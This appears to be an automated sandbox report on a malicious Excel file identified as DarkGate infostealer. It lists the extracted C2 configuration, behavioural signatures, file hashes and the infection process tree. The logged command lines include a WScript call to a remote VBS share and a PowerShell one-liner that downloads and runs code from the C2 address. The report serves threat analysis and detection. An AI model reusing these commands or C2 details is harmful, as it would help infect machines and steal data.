Overview

overview

10

Static

static

1

statapril2...3.xlsx

windows7-x64

1

statapril2...3.xlsx

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    273s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-04-2024 15:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    statapril2024-1353.xlsx

  • Size

    56KB

  • MD5

    d1565887c88e31fe8de1d68832f52bb9

  • SHA1

    580731aa5c735a3051883cbabc1b36c63fdc4bcd

  • SHA256

    6a20b1568c0edaede64a58f2843b68a6a098cc99bd4554c7bfc339bfb4d67338

  • SHA512

    8e7fecb175eb507d3468b645a8474eaa4c0518832b32328dbf949c1f1adbb821d43a82103d539e71b259232457ad16d6a33e80d819b078ea34e4fa9c797b47a4

  • SSDEEP

    768:ZFnM1dDlT2qpaOKFSGOJdGvoZCPAUJ1YxBardD2TSWGdCIKD15ogXnlq5ndm:/mZ2u4OPKIxoEuDKJnlCm

Score
10/10
darkgateadmin888stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

103.124.106.237

Attributes
  • anti_analysis

    true

  • anti_debug

    false

  • anti_vm

    true

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    bedxvHpr

  • minimum_disk

    50

  • minimum_ram

    4000

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 4 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 49 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\statapril2024-1353.xlsx"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\kady\AutoHotkey.exe
          "C:\kady\AutoHotkey.exe" C:/kady/script.ahk
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:2628
        • C:\Windows\system32\attrib.exe
          "C:\Windows\system32\attrib.exe" +h C:/kady/
          4⤵
          • Views/modifies file attributes
          PID:1820
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\kady\AutoHotkey.exe
          "C:\kady\AutoHotkey.exe" C:/kady/script.ahk
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4072
        • C:\Windows\system32\attrib.exe
          "C:\Windows\system32\attrib.exe" +h C:/kady/
          4⤵
          • Views/modifies file attributes
          PID:1776
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1320
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4592
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\{8427925A-D0E1-481F-A2B7-25E6ABC61844} - OProcSessId.dat
        2⤵
          PID:1700
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\~DF92A583A10E2AF9CD.TMP
          2⤵
            PID:2376

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          56c43715e0e7fa58012d8a5769d8d568

          SHA1

          4370ca3436f2e3a95b47a728503a2c22a5a5fa39

          SHA256

          8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

          SHA512

          b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          0058afe7072257df741ebf2b5a7d37e1

          SHA1

          38d7c4c9a6268430d20afc2347213c8674203cdd

          SHA256

          578fee822ab4d29b50c82cc3dc38c900ed102141fd72096041a49b2880f90db3

          SHA512

          03f435a229e0191ec3d411513f9b7c22c7d1edae92b38e530b09179319b9288e6875fdb7cfcba64f9a2efcfe24532fff8465461e17f36d838620ea16b475bf37

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxqcsfdm.h54.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\cBCBFEC
          Filesize

          32B

          MD5

          3497caec5be5aee7352415ce8f5aec77

          SHA1

          1950e7058cc3f4b0fc9368a6f0122b19f08c167e

          SHA256

          907559c25ff5b484953a002408e33dfe45fb37e5e960fec9ed285397b1fd1f9c

          SHA512

          9a5877c1ef06046fc40134fb410c8c2fde490970e3b556ba9daee9467f5701fab19d5db1aa1b7c9cbd33554f5727fc2ef51df142327170627a6a5d9d0316a077

          Download Submit

        • C:\kady\AutoHotkey.exe
          Filesize

          892KB

          MD5

          a59a2d3e5dda7aca6ec879263aa42fd3

          SHA1

          312d496ec90eb30d5319307d47bfef602b6b8c6c

          SHA256

          897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

          SHA512

          852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

          Download Submit

        • C:\kady\script.ahk
          Filesize

          441B

          MD5

          958cd4a849145b96e92e63ef4e152349

          SHA1

          19d79b480294e7c329c19faf87fc5e3320268caa

          SHA256

          8e7070383517cc127dfff26a726a47fc48a9169591e29c8d16df6fdd6d2c591e

          SHA512

          7852834cf31f55c6d97fdc204b59b8177d336c1f5ee1a14ae880e34c3e8c407953f1722274c040c93c5ac978f1a6ddb9d4a1b5019b6d3a99dd081440528210a0

          Download Submit

        • C:\kady\test.txt
          Filesize

          922KB

          MD5

          8ed12b37b69693e66f928cd39fc21c6c

          SHA1

          2ee8c14330d38f3ba3c23e4bb56c05b29191ff03

          SHA256

          70223ac25fecd28385f39f36367f93b045c312f062354497dd2702e7d295784d

          SHA512

          50daf960cd89efe9b562db00177f27f3ba9e0929be830406857d9879a49c58f62d5d03c1b01c83104f47784da02b2cc2fab28c9b653e1a1861d4b319271e2795

          Download Submit

        • memory/1784-10-0x00007FFB100B0000-0x00007FFB100C0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-33-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-11-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-12-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-0-0x00007FFB12A10000-0x00007FFB12A20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-13-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-14-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-15-0x00007FFB100B0000-0x00007FFB100C0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-16-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-17-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-18-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-19-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-20-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-5-0x00007FFB12A10000-0x00007FFB12A20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-34-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-35-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-8-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-2-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-1-0x00007FFB12A10000-0x00007FFB12A20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-9-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-3-0x00007FFB12A10000-0x00007FFB12A20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1784-4-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-6-0x00007FFB52990000-0x00007FFB52B85000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/1784-7-0x00007FFB12A10000-0x00007FFB12A20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2628-84-0x0000000000AC0000-0x0000000000B34000-memory.dmp

          Filesize

          464KB

          Download

        • memory/2628-86-0x0000000000AC0000-0x0000000000B34000-memory.dmp

          Filesize

          464KB

          Download

        • memory/3288-47-0x0000012029510000-0x0000012029520000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3288-45-0x0000012029520000-0x0000012029542000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3288-50-0x0000012041C50000-0x0000012041E12000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/3288-49-0x0000012029510000-0x0000012029520000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3288-48-0x0000012029510000-0x0000012029520000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3288-69-0x00007FFB26C00000-0x00007FFB276C1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3288-46-0x00007FFB26C00000-0x00007FFB276C1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4072-114-0x0000000004720000-0x0000000004794000-memory.dmp

          Filesize

          464KB

          Download

        • memory/4072-112-0x0000000004720000-0x0000000004794000-memory.dmp

          Filesize

          464KB

          Download

        • memory/4816-87-0x0000023CC5560000-0x0000023CC5570000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4816-109-0x00007FFB26C00000-0x00007FFB276C1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4816-105-0x00007FFB26C00000-0x00007FFB276C1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4816-73-0x0000023CC5560000-0x0000023CC5570000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4816-72-0x00007FFB26C00000-0x00007FFB276C1000-memory.dmp

          Filesize

          10.8MB

          Download